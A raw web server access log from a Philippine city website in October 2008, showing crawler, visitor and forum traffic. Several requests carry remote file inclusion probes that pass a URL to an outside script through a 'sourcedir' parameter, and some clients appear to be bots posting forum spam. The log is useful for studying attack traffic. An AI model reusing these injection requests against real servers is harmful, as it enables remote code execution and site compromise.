200.63.42.95 - - [30/Oct/2008:05:26:02 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:05:26:03 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41368 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:26:03 -0700] "GET /logs/access_080910.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:26:03 -0700] "GET /logs/access_081008.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:26:04 -0700] "GET /logs/access_081004.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:26:07 -0700] "GET /listings/event/results.php?category_id=5 HTTP/1.1" 200 10502 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:26:11 -0700] "GET /logs/access_080926.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:26:12 -0700] "GET /logs/access_080916.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:05:26:13 -0700] "GET /jodera2/index.php?sid=3f9561836b8c08933018899c64da65d2 HTTP/1.0" 200 55207 "-" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:26:17 -0700] "GET /listings/event/results.php?category_id=7 HTTP/1.1" 200 10510 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:26:17 -0700] "GET /listings/listing/results.php?letter=x&category_id=719 HTTP/1.1" 200 25082 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:26:17 -0700] "GET /listings/listing/results.php?letter=c&category_id=692 HTTP/1.1" 200 25073 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:05:26:20 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41364 "-" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "www.sancarloscity.org"
41.207.162.4 - - [30/Oct/2008:05:26:21 -0700] "GET /realestate/ HTTP/1.1" 200 19191 "http://www.google.com/search?hl=en&q=hotmail.com+email+Contact+of+Real+Estate+in+Philippines&start=40&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:26:21 -0700] "GET /listings/listing/results.php?letter=h&category_id=739 HTTP/1.1" 200 25109 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:26:22 -0700] "GET /logs/access_081016.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
41.207.162.4 - - [30/Oct/2008:05:26:23 -0700] "GET /style.css HTTP/1.1" 200 17050 "http://www.sancarloscity.org/realestate/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:26:24 -0700] "GET /logs/access_081002.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
74.6.8.93 - - [30/Oct/2008:05:26:26 -0700] "GET /qphotogallery/displayimage.php?pos=-149 HTTP/1.0" 200 21592 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:26:26 -0700] "GET /listings/listing/results.php?letter=s&category_id=728 HTTP/1.1" 200 25097 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:26:26 -0700] "GET /listings/listing/results.php?letter=m&category_id=698 HTTP/1.1" 200 25121 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:26:32 -0700] "GET /logs/access_081018.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
41.207.162.4 - - [30/Oct/2008:05:26:40 -0700] "GET /sanjulioban.gif HTTP/1.1" 200 7587 "http://www.sancarloscity.org/realestate/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "sancarloscity.org"
74.6.8.93 - - [30/Oct/2008:05:26:44 -0700] "GET /picgallery/login.php?referer=%2Fpicgallery%2Fthumbnails.php%3Falbum%3Dlastcom%26cat%3D14 HTTP/1.0" 200 5035 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:26:45 -0700] "GET /logs/access_080927.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
89.149.202.60 - - [30/Oct/2008:05:26:46 -0700] "GET /jodera2/posting.php?mode=reply&t=24066 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24066" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040815 Firefox/0.8 (MOOX M3)" "www.sancarloscity.org"
89.149.202.60 - - [30/Oct/2008:05:26:47 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=24066&sid=f3b97a5e4f55a4deb73e5982b756e782 HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24066&sid=f3b97a5e4f55a4deb73e5982b756e782" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040815 Firefox/0.8 (MOOX M3)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:26:47 -0700] "GET /listings/event/results.php?category_id=3 HTTP/1.1" 200 30951 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:05:26:48 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11446 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "www.sancarloscity.org"
89.149.202.60 - - [30/Oct/2008:05:26:48 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24066&sid=f3b97a5e4f55a4deb73e5982b756e782" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040815 Firefox/0.8 (MOOX M3)" "www.sancarloscity.org"
89.149.202.60 - - [30/Oct/2008:05:26:49 -0700] "GET /jodera2/posting.php?mode=reply&t=24066&sid=f3b97a5e4f55a4deb73e5982b756e782 HTTP/1.0" 200 50518 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24066&sid=f3b97a5e4f55a4deb73e5982b756e782" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040815 Firefox/0.8 (MOOX M3)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:05:26:55 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11442 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "www.sancarloscity.org"
89.149.202.60 - - [30/Oct/2008:05:27:01 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24066&sid=f3b97a5e4f55a4deb73e5982b756e782" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040815 Firefox/0.8 (MOOX M3)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:27:01 -0700] "GET / HTTP/1.1" 200 44270 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:27:02 -0700] "GET /listings/event/results.php?category_id=15 HTTP/1.1" 200 19576 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
89.149.202.60 - - [30/Oct/2008:05:27:02 -0700] "GET /jodera2/viewtopic.php?p=29888 HTTP/1.0" 200 81162 "http://www.sancarloscity.org/viewtopic.php?p=29888#29888" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040815 Firefox/0.8 (MOOX M3)" "www.sancarloscity.org"
72.30.161.235 - - [30/Oct/2008:05:27:04 -0700] "GET /listings/listing/results.php?letter=m&category_id=696 HTTP/1.0" 200 25141 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:27:08 -0700] "GET /listings/event/results.php?category_id=11 HTTP/1.1" 200 10518 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:27:15 -0700] "GET /listings/event/results.php?category_id=13 HTTP/1.1" 200 17400 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:27:24 -0700] "GET /listings/event/results.php?month=200810&this_date=20081001 HTTP/1.1" 200 30902 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:27:31 -0700] "GET /listings/event/results.php?month=200809&this_date=20080901 HTTP/1.1" 200 11946 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:27:45 -0700] "GET /listings/event/results.php?month=200811&this_date=20081101 HTTP/1.1" 200 33845 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:27:56 -0700] "GET /listings/event/results.php?category_id=9 HTTP/1.1" 200 10520 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:28:08 -0700] "GET /listings/event/results.php?category_id=14 HTTP/1.1" 200 10510 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:28:13 -0700] "GET /listings/event/results.php?category_id=2 HTTP/1.1" 200 23699 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:28:19 -0700] "GET /listings/event/results.php?category_id=6 HTTP/1.1" 200 19402 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:28:19 -0700] "GET / HTTP/1.1" 200 44270 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:28:25 -0700] "GET /listings/event/results.php?category_id=8 HTTP/1.1" 200 20626 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
82.99.30.55 - - [30/Oct/2008:05:28:26 -0700] "GET /jodera2/index.php?sid=3fbde64921d2afd2b92997b0d144bcd4 HTTP/1.0" 200 61917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:28:30 -0700] "GET /listings/event/results.php?category_id=10 HTTP/1.1" 200 10506 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
67.83.99.187 - - [30/Oct/2008:05:28:58 -0700] "GET /forum2/index.php?showuser=155 HTTP/1.1" 200 9243 "http://search.yahoo.com/search?p=kabugan&ei=utf-8&fr=b2ie7" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)" "www.sancarloscity.org"
67.83.99.187 - - [30/Oct/2008:05:28:58 -0700] "GET /forum2/style_images/css_2.css HTTP/1.1" 200 31951 "http://www.sancarloscity.org/forum2/index.php?showuser=155" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)" "www.sancarloscity.org"
67.83.99.187 - - [30/Oct/2008:05:28:59 -0700] "GET /forum2/jscripts/ips_ipsclass.js HTTP/1.1" 200 6562 "http://www.sancarloscity.org/forum2/index.php?showuser=155" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)" "www.sancarloscity.org"
67.83.99.187 - - [30/Oct/2008:05:28:59 -0700] "GET /forum2/jscripts/ipb_global.js HTTP/1.1" 200 17304 "http://www.sancarloscity.org/forum2/index.php?showuser=155" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)" "www.sancarloscity.org"
67.83.99.187 - - [30/Oct/2008:05:29:00 -0700] "GET /forum2/jscripts/ips_menu.js HTTP/1.1" 200 6059 "http://www.sancarloscity.org/forum2/index.php?showuser=155" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)" "www.sancarloscity.org"
67.83.99.187 - - [30/Oct/2008:05:29:00 -0700] "GET /forum2/style_images/red_crysta/folder_js_skin/ips_menu_html.js HTTP/1.1" 200 2931 "http://www.sancarloscity.org/forum2/index.php?showuser=155" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)" "www.sancarloscity.org"
67.83.99.187 - - [30/Oct/2008:05:29:00 -0700] "GET /forum2/cache/lang_cache/en/lang_javascript.js HTTP/1.1" 200 2294 "http://www.sancarloscity.org/forum2/index.php?showuser=155" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)" "www.sancarloscity.org"
67.83.99.187 - - [30/Oct/2008:05:29:01 -0700] "GET /forum2/jscripts/ips_xmlhttprequest.js HTTP/1.1" 200 3619 "http://www.sancarloscity.org/forum2/index.php?showuser=155" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)" "www.sancarloscity.org"
67.83.99.187 - - [30/Oct/2008:05:29:01 -0700] "GET /forum2/jscripts/ipb_global_xmlenhanced.js HTTP/1.1" 200 5981 "http://www.sancarloscity.org/forum2/index.php?showuser=155" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)" "www.sancarloscity.org"
67.83.99.187 - - [30/Oct/2008:05:29:02 -0700] "GET /forum2/jscripts/dom-drag.js HTTP/1.1" 200 4105 "http://www.sancarloscity.org/forum2/index.php?showuser=155" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)" "www.sancarloscity.org"
67.83.99.187 - - [30/Oct/2008:05:29:02 -0700] "GET /forum2/style_images/red_crysta/iframe.html HTTP/1.1" 200 474 "http://www.sancarloscity.org/forum2/index.php?showuser=155" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)" "www.sancarloscity.org"
67.83.99.187 - - [30/Oct/2008:05:29:03 -0700] "GET /forum2/index.php?s=22bfdf4d58b7fa01e5457762f996ae02act=task HTTP/1.1" 200 9211 "http://www.sancarloscity.org/forum2/index.php?showuser=155" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:29:26 -0700] "GET /listings/event/results.php?category_id=4 HTTP/1.1" 200 29293 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:29:31 -0700] "GET /listings/event/results.php?category_id=12 HTTP/1.1" 200 10510 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:29:37 -0700] "GET /listings/listing/results.php?category_id=699 HTTP/1.1" 200 31242 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:29:42 -0700] "GET /listings/listing/results.php?category_id=711 HTTP/1.1" 200 31209 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:29:48 -0700] "GET /listings/listing/results.php?category_id=698 HTTP/1.1" 200 33523 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
89.149.196.212 - - [30/Oct/2008:05:29:52 -0700] "GET /jodera2/posting.php?mode=reply&t=24068 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24068" "Opera/9.00 (Windows NT 4.0; U; en)" "www.sancarloscity.org"
89.149.196.212 - - [30/Oct/2008:05:29:52 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=24068&sid=98c438bec306f388ac2cb87dc1ef8fde HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24068&sid=98c438bec306f388ac2cb87dc1ef8fde" "Opera/9.00 (Windows NT 4.0; U; en)" "www.sancarloscity.org"
89.149.196.212 - - [30/Oct/2008:05:29:53 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24068&sid=98c438bec306f388ac2cb87dc1ef8fde" "Opera/9.00 (Windows NT 4.0; U; en)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:29:53 -0700] "GET /listings/listing/results.php?category_id=705 HTTP/1.1" 200 24477 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
89.149.196.212 - - [30/Oct/2008:05:29:54 -0700] "GET /jodera2/posting.php?mode=reply&t=24068&sid=98c438bec306f388ac2cb87dc1ef8fde HTTP/1.0" 200 50562 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24068&sid=98c438bec306f388ac2cb87dc1ef8fde" "Opera/9.00 (Windows NT 4.0; U; en)" "www.sancarloscity.org"
89.149.196.212 - - [30/Oct/2008:05:30:05 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24068&sid=98c438bec306f388ac2cb87dc1ef8fde" "Opera/9.00 (Windows NT 4.0; U; en)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:30:06 -0700] "GET /listings/listing/results.php?category_id=709 HTTP/1.1" 200 26705 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
89.149.196.212 - - [30/Oct/2008:05:30:06 -0700] "GET /jodera2/viewtopic.php?p=29889#29889 HTTP/1.0" 200 80528 "http://www.sancarloscity.org/viewtopic.php?p=29889#29889" "Opera/9.00 (Windows NT 4.0; U; en)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:30:11 -0700] "GET /listings/listing/results.php?category_id=736 HTTP/1.1" 200 24382 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:30:18 -0700] "GET /listings/listing/results.php?category_id=722 HTTP/1.1" 200 47383 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:30:26 -0700] "GET / HTTP/1.1" 200 44270 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:30:30 -0700] "GET /listings/listing/results.php?category_id=714 HTTP/1.1" 200 24415 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:30:35 -0700] "GET /listings/listing/results.php?category_id=696 HTTP/1.1" 200 28997 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:31:02 -0700] "GET /listings/listing/results.php?category_id=691 HTTP/1.1" 200 53084 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:31:11 -0700] "GET /listings/listing/results.php?letter=y&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
74.6.8.93 - - [30/Oct/2008:05:31:21 -0700] "GET /pango/viewer/ HTTP/1.0" 200 1986 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:31:23 -0700] "GET /listings/listing/results.php?letter=w&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
82.99.30.47 - - [30/Oct/2008:05:31:29 -0700] "GET /jodera2/faq.php?sid=3fbde64921d2afd2b92997b0d144bcd4 HTTP/1.0" 200 68232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
89.149.241.165 - - [30/Oct/2008:05:31:31 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.sancarloscity.org"
89.149.241.165 - - [30/Oct/2008:05:31:32 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=1745daf885bd086757124e1ae580a70b HTTP/1.0" 200 12362 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=1745daf885bd086757124e1ae580a70b" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.sancarloscity.org"
89.149.241.165 - - [30/Oct/2008:05:31:32 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=1745daf885bd086757124e1ae580a70b" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.sancarloscity.org"
89.149.241.165 - - [30/Oct/2008:05:31:33 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1&sid=1745daf885bd086757124e1ae580a70b HTTP/1.0" 200 40970 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=1745daf885bd086757124e1ae580a70b" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.sancarloscity.org"
89.149.241.165 - - [30/Oct/2008:05:31:40 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=1745daf885bd086757124e1ae580a70b" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.sancarloscity.org"
89.149.241.165 - - [30/Oct/2008:05:31:41 -0700] "GET /jodera2/viewtopic.php?p=29890 HTTP/1.0" 200 31316 "http://www.sancarloscity.org/viewtopic.php?p=29890#29890" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.sancarloscity.org"
